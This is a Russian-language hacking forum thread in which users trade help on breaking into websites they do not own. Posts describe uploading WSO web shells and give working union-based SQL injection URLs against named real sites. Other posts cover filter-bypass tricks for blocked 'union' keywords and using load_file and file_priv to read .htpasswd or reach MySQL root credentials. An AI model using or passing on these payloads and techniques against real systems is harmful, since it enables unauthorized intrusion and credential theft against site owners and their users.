Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ZARO

    ZARO Elder - Старейшина

    Joined:
    17 Apr 2009
    Messages:
    330
    Likes Received:
    129
    Reputations:
    54
    Ни как не могу разобраться с rewrite mode. Залил шелл на сайт. При обращении на /store/checkout/payment_info/xxxxxxxx, где xxxxxxxx уникальный ID, выводится определенная инфа. Все перекопал, но не могу найти тот скрипт на шелле, который обрабатывает ID и выводит инфу. Сервак очень большой, с реврайтом очень плохо знаком. Как можно узнать?
     
  2. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    41
    Likes Received:
    0
    Reputations:
    0
    как узнать полный путь к корню сайта,если в ошибках его нету?
     
  3. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    41
    Likes Received:
    0
    Reputations:
    0
    Помогите не могу залить шелл на сайт,хочу залить WSO уже залил файл для закачки шелла,заливаю шелл,перехожу на страницу с шелом,а там показан код шелла,и страница ещё не успев полностью загрзиться,закрывается,и перебрасвает меня на страницу с ошибкой,где написанно,что подключение закрыто удаленным сервером.
     
  4. Groove

    Groove Member

    Joined:
    13 Nov 2010
    Messages:
    181
    Likes Received:
    20
    Reputations:
    2
    Срочно нужен shell для sql возможности (Изменить , сохранить , удалить ) Киньте ссылку плиз .
     
  5. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    а сам не пробовал искать?

    шелл на php тык
     
    _________________________
  6. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    390
    Likes Received:
    48
    Reputations:
    11
    он наверно не про это имел ввиду,а про то чтобы не запросом всё это делать а просто нажал изменить,сохранить.
    не видел я правда ещё таких шеллов,но можешь небольшой скрипт закинуть и использовать называется так MySQL RST/GHC Manager(весит гдето 100 kb)
     
  7. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    843
    Likes Received:
    170
    Reputations:
    84
    Имел кто дело с SFTcms v 2.0?
    Картинки заливаются, но куда, черт ногу сломит =/
     
  8. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    736
    Likes Received:
    73
    Reputations:
    19
    Качай исходники смотри что куда, но 60% что в БД ищи другие пути.
     
    1 person likes this.
  9. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    843
    Likes Received:
    170
    Reputations:
    84
    бло, исходники нагуглить не могу... Мб есть у кого?
     
  10. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    843
    Likes Received:
    170
    Reputations:
    84
    Как крутить без еррорбазед?
     
  11. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Всмысле как?
    Code:
    http://www.si-ultra.biz/catalog/seria.php?k=12-9999.9+union+select+1,version(),3--+f
    Тайтл смотри :D
     
    1 person likes this.
  12. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    843
    Likes Received:
    170
    Reputations:
    84
    Сенк! А если в тайтле вывода бы не было?
     
  13. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    843
    Likes Received:
    170
    Reputations:
    84
    wtf?
     
  14. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    792
    Likes Received:
    349
    Reputations:
    120
    http://www.nashpereviznuk.net/print.php?r=news&new=-4664+union+select+1,version(),3,4,5,6,7,8,9,10,11--+
    wtf?
    wtf?
     
    3 people like this.
  15. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    Хелп ми )) фильтруется union, что можно сделать?
    Пробовал:
    -разным регистром написать
    -/*!UnIoN*/
    при нахождении union в запросе выдает The requested URL was not found on this server.
     
  16. t3cHn0iD

    t3cHn0iD Banned

    Joined:
    6 Apr 2009
    Messages:
    315
    Likes Received:
    63
    Reputations:
    66
    https://rdot.org/forum/showthread.php?t=60
     
  17. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    162
    Likes Received:
    1
    Reputations:
    -10
    Нашел скулю в пост запросе. Помогли её раскрутить. Но такая проблема, в роботс прописано вот что:
    Code:
    User-agent: *
    Crawl-delay: 5 #
    Disallow: /admin/
    Disallow: /administrator/
    Disallow: /cache/
    Disallow: /components/
    Disallow: /includes/
    Disallow: /installation/
    Disallow: /language/
    Disallow: /libraries/
    Disallow: /logs/
    Disallow: /media/
    Disallow: /modules/
    Disallow: /plugins/
    Disallow: /templates/
    Disallow: /tmp/
    Disallow: /xmlrpc/
    Disallow: /search/?s*
    
    при переходе на /admin вылезает бейсик авторизация, лог пас пара не верная. Что делать?
     
  18. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    943
    Likes Received:
    802
    Reputations:
    605
    предполагаю что это джумла, а админка как бы тут /administrator/
     
    _________________________
    1 person likes this.
  19. Cherep

    Cherep New Member

    Joined:
    30 May 2010
    Messages:
    162
    Likes Received:
    1
    Reputations:
    -10
    /administrator/ тоже выдает бейсик авторизацию
     
  20. красавец

    Joined:
    26 Jan 2012
    Messages:
    15
    Likes Received:
    4
    Reputations:
    5
    Cherep
    попробуй через load_file вытащить то что в корне сайта в .htpasswd
    если есть права на чтение, или просто проверь file_priv, а может повезёт и есть доступ к mysql.root ))
     
Loading...
Thread Status:
Not open for further replies.